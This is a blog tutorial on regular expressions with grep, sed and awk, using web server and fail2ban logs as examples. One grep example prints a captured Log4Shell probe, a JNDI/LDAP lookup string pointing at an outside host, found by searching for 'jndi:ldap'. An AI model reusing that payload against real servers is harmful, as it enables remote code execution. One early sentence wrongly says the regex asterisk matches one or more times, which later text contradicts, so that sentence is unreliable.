17 December 2021
A regular expression, or regex, is a sequence of characters that represents a pattern. They are commonly used in code and text processing. For instance, you can use a regex to validate user input or to filter specific data from a log file.
Regular expressions should not be confused with globbing. A glob is also a sequence of characters that represents a pattern, but it is used only for file name expansion on the command line. As a simple example of globbing, you can list all PHP files in a directory with the command ls *.php
. The glob in the command is the asterisk – it matches zero or more characters. In a regex the asterisk matches one or more instances of the preceding character. There a few differences like this, and it is easy to get them muddled up.
Another thing to be aware of is there are two types of regular expressions: basic (BRE) and extended (ERE). As the names suggest, extended regular expressions have a few extra options. Utilities such as grep
and sed
use basic regular expressions by default. However, with both you can use the -E
option to enable extended regular expressions.
The caret (^
) and dollar sign ($
) denote the start and end of a string. You can use the caret to get lines in a file that start with a certain string, such as a date or IP address:
# grep ^1.2.3.4 /var/log/httpd/example.log 1.2.3.4 - - [14/Dec/2021:04:55:27 +0000] "GET /wp-login.php HTTP/1.1" 403 247 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" ...
Or, on a RHEL-based system you can count the number of AMD64 packages by looking at the end of the package names. Here, I list all packages on my system and then pipe the output to a grep
command that counts the number of lines that end with the string “x86_64”:
# rpm -qa | grep -c x86_64$ 541
And you can also use both anchors. For instance, this is a quick way to delete empty lines using sed
. The command matches any lines in the file data that start and end with nothing (i.e. there is nothing between the caret and dollar sign):
$ sed '/^$/d' data
A dot matches any character. For instance, here I look for lines in a log file where the first field matches the pattern “^2021-12-1.$”:
# awk '$1 ~ /^2021-12-1.$/ {print $0}' /var/log/fail2ban.log 2021-12-10 00:00:06,495 fail2ban.filter [862]: INFO [sshd] Found 221.131.165.62 - 2021-12-10 00:00:06 2021-12-10 00:01:43,818 fail2ban.filter [862]: INFO [sshd] Found 209.141.34.220 - 2021-12-10 00:01:43 ... 2021-12-15 16:23:10,577 fail2ban.filter [862]: INFO [sshd] Found 34.118.67.208 - 2021-12-15 16:23:10
If you are an eagle-eyed reader then you might have noticed that the regex is more or less redundant. The pattern “2021-12-1” would return the same set of results. The difference is that the pattern “^2021-12-1.$” makes sure that you only match lines that start with “2021-12-1” plus a single character. It would ignore any malformed date fields.
The dot is often used in combination with the asterisk, which is a quantifier that matches the preceding character zero or more times. You can use this to grep multiple strings on a single line. For instance, here, I look for lines containing the strings “14/Dec” and “jndi:ldap” (with anything inbetween the two patterns):
# grep "14/Dec.*jndi:ldap" /var/log/httpd/example.log 112.74.52.90 - - [14/Dec/2021:11:40:06 +0000] "GET / HTTP/1.1" 200 4917 "-" "/${jndi:ldap://45.83.193.150:1389/Exploit}"
A minute ago I argued that the pattern “^2021-12-1.$” is slightly better than “2021-12-1”. As things stand, though, the pattern would match a string like “2021-12-1x”. That is a problem, as our aim is to match (valid) dates.
We can further improve the pattern by making sure that the last character is digit. To do so, you can use a range:
# awk '$1 ~ /^2021-12-1[0-9]$/ {print $0}' /var/log/fail2ban.log 2021-12-10 00:00:06,495 fail2ban.filter [862]: INFO [sshd] Found 221.131.165.62 - 2021-12-10 00:00:06 2021-12-10 00:01:43,818 fail2ban.filter [862]: INFO [sshd] Found 209.141.34.220 - 2021-12-10 00:01:43 ... 2021-12-15 16:23:10,577 fail2ban.filter [862]: INFO [sshd] Found 34.118.67.208 - 2021-12-15 16:23:10
A range is defined in square brackets. In the above example I used “[0-9]”, which matches any digit in the range 0 to 9. You can do the same with letters. For instance, “[a-z]” matches all letters of the alphabet. It is worth pointing out that the latter pattern is case-sensitive. To match all letters of the alphabet in either lower or upper case you can use “[a-zA-Z]”. And to match any alphanumeric character you can use “[a-zA-Z0-9]”.
You can also specify specific characters rather than a range. For instance, if you have a script that needs to check if a user answered “y” or “Y” to a question then you use “[yY]”.
You can also do that reverse. If you want to make sure a string doesn’t match any digits then you can put a caret at the start of the range. So, “[^0-9]” matches everything but digits. Notice that the meaning of the caret symbol is now wildly different from its earlier meaning. Outside ranges the caret denotes the start of a string.
There are a few special character classes you can use instead of ranges such as “[a-z]”. These classes use a pair of double square brackets, and the type of class is defined inside a pair of colons.
Class | Matches | Equivalent |
---|---|---|
[[:alpha:]] | Alphabetical characters | [a-zA-Z] |
[[:alnum:]] | Alphabetical characters and integers | [a-zA-Z0-9] |
[[:blank:]] | Space or tab characters | [ \t] |
[[:digit:]] | Integers | [0-9] |
[[:lower:]] | Lower case alphabetical characters | [a-z] |
[[:upper:]] | Upper case alphabetical characters | [A-Z] |
Extended regular expressions bring a few more meta characters to the party. As mentioned, you need to use the -E
option if you want to use ERE in grep
and sed
.
Like the asterisk, the question mark is a quantifier. But, whereas the asterisk matches the preceding character zero or more times, the question mark matches the preceding character zero or one time. To illustrate, if you want to check if a user entered “y”, “Y”, “yes” or “YES” then you can use the pattern “^[yY][eE]?[sS]?$”:
$ echo 'y' | grep -E "^[yY][eE]?[sS]?$" y $ echo 'YES' | grep -E "^[yY][eE]?[sS]?$" YES $ echo 'YES!' | grep -E "^[yY][eE]?[sS]?$"
Notice that the string “YES!” does not match. The reason is that I used the dollar sign to mark where the string ends.
Curly braces ({
and }
) let you specify how many times the preceding element can appear. For instance, let’s say you want to check if a string uses the format YYYY-MM-DD. You can do that with the following pattern:
$ echo '2021-12-15' | grep -E "^[[:digit:]]{4}-[[:digit:]]{2}-[[:digit:]]{2}$" 2021-12-15 $ echo '21-12-15' | grep -E "^[[:digit:]]{4}-[[:digit:]]{2}-[[:digit:]]{2}$"
The second test failed because the string “21-12-15” doesn’t start with four digits. If you want to allow either two or four digits then you can use this pattern instead:
$ echo '2021-12-15' | grep -E "^[[:digit:]]{2,4}-[[:digit:]]{2}-[[:digit:]]{2}$" 2021-12-15 $ echo '21-12-15' | grep -E "^[[:digit:]]{2,4}-[[:digit:]]{2}-[[:digit:]]{2}$" 21-12-15
An alternative way to validate the strings “2021-12-15” and “21-12-15” is to use grouping expressions. You can group a pattern using parentheses, and you can combine an expression with meta characters. So, you can use “(20)?” if the string may or may not start with “20”:
$ echo '2021-12-15' | grep -E "^(20)?21-[[:digit:]]{2}-[[:digit:]]{2}$" 2021-12-15 $ echo '21-12-15' | grep -E "^(20)?21-[[:digit:]]{2}-[[:digit:]]{2}$" 21-12-15
The pipe symbol (|
) functions as an OR operator. In other words, it let’s you match one of mulitple patterns. This can be handy to grep lines that contain one of mulitple strings.
For instance, if you want to check if a website redirects correctly you can use a simple cURL command. That works, but the output contains lots of other information:
$ curl -IL catalyst2.com HTTP/1.1 301 Moved Permanently Connection: Keep-Alive Keep-Alive: timeout=5, max=100 date: Tue, 14 Dec 2021 15:04:41 GMT location: https://catalyst2.com/ x-frame-options: SAMEORIGIN HTTP/2 301 content-type: text/html; charset=UTF-8 strict-transport-security: max-age=10886400 expires: Mon, 13 Dec 2021 14:11:46 GMT cache-control: max-age=3600 x-redirect-by: WordPress location: https://www.catalyst2.com/ x-litespeed-cache: hit date: Tue, 14 Dec 2021 15:04:41 GMT x-frame-options: SAMEORIGIN alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46" HTTP/2 200 content-type: text/html; charset=UTF-8 strict-transport-security: max-age=10886400 link: <https://www.catalyst2.com/wp-json/>; rel="https://api.w.org/" link: <https://www.catalyst2.com/wp-json/wp/v2/pages/5>; rel="alternate"; type="application/json" link: <https://www.catalyst2.com/>; rel=shortlink etag: "24284-1639400931;;;" x-litespeed-cache: hit date: Tue, 14 Dec 2021 15:04:41 GMT x-frame-options: SAMEORIGIN alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
To get just the information you are interested in you can grep lines that start with either “HTTP” or “Location”:
$ curl --silent -IL catalyst2.com | grep -Ei ^"http|location" HTTP/1.1 301 Moved Permanently location: https://catalyst2.com/ HTTP/2 301 location: https://www.catalyst2.com/ HTTP/2 200